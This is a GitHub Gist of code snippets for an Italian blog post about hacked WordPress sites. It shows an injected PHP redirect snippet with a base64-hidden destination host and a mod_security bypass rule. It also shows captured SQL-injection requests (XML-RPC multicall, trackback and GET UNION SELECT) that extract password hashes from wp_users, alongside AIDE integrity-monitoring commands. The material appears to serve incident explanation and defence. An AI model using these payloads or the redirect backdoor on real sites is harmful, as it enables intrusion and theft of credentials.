Last active
January 1, 2016 13:09
-
-
Save aldolat/8149012 to your computer and use it in GitHub Desktop.
Pezzi di codice per il post http://www.aldolat.it/2008/wordpress/il-vostro-sito-wordpress-e-stato-violato/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa"); | |
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; } | |
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>< ?php |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# BEGIN WordPress | |
<ifmodule mod_rewrite.c> | |
RewriteEngine On | |
RewriteBase / | |
RewriteCond %{REQUEST_FILENAME} !-f | |
RewriteCond %{REQUEST_FILENAME} !-d | |
RewriteRule . /index.php [L] | |
</ifmodule> | |
# END WordPress |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<ifmodule mod_security.c> | |
<files async-upload.php> | |
SecFilterEngine Off | |
SecFilterScanPOST Off | |
</files> | |
</ifmodule> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
POST: Array | |
( | |
[cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132; | |
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
HTTP_RAW_POST_DATA: <?xml version=”1.0″?> | |
<methodCall> | |
<methodName>system.multicall</methodName> | |
<params> | |
<param><value><array><data> | |
<value><struct> | |
<member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member> | |
<member><name>params</name><value><array><data> | |
<value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value> | |
</data></array></value></member></blockquote> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
URL: /wp-trackback.php?tb_id=1 | |
POST: Array | |
( | |
[title] => 1 | |
[url] => 1 | |
[blog_name] => 1 | |
[tb_id] => 666666\’ | |
[1740009377] => 1 | |
[496546471] => 1 | |
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
URL: /wp-trackback.php?p=1 | |
POST: Array | |
( | |
[url] => ekibastos | |
[title] => ekibastos | |
[excerpt] => ekibastos | |
[blog_name] => +AFw-\’)/* | |
[charset] => UTF-7 | |
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<meta name=”generator” content=”WordPress 2.5.1″ /> <!-- leave this for stats --> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version=”1.0″?> | |
<methodCall> | |
<methodName>pingback.ping</methodName> | |
<params> | |
<param><value><string>k1b0rg’ icq: 76-86-20</string></value></param> | |
<param><value><string>http://ocaoimh.ie/?p=k1b0rg#ls</string></value></param> | |
<param><value><string>admin</string></value></param> | |
</params> | |
</methodCall> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
apt-get install aide | |
vi /etc/aide/aide.conf.d/88_aide_web | |
/usr/sbin/aideinit |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/home/web/ Checksums | |
!/home/www/logs/.* | |
!/home/web/public_html/wp-content/cache/.* | |
!/home/web/.*/htdocs/wp-content/cache/.* |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1 | |
GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment